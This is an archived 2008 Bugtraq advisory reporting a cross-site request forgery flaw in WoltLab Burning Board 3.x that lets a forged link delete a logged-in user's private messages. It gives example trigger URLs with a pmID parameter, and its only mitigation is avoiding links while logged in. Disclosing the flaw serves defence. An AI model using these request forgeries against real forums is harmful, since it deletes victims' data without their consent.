lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200801270023.28058.nbbn@gmx.net>
Date: Sun, 27 Jan 2008 00:23:28 +0100
From: nbbn@....net
To: bugtraq@...urityfocus.com
Subject: WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability

#############################################################################
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability
by NBBN.         Founded: 25 December 2007
#############################################################################


Examples:
http://domain.tld/wbb3/index.php?page=PM&amp;action=delete&amp;pmID=[pmid]
http://domain.tld/wbb3/index.php?page=PM&amp;action=delete&amp;pmID=1

Fix: 

Wait for a fix. Or never surf in other sites, if you have autologin on and 
don't click links, when you are logged in. 

Vulnerability Versions:

I tested it only on 3.0.1 but I think that all version of 3 are vuln.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ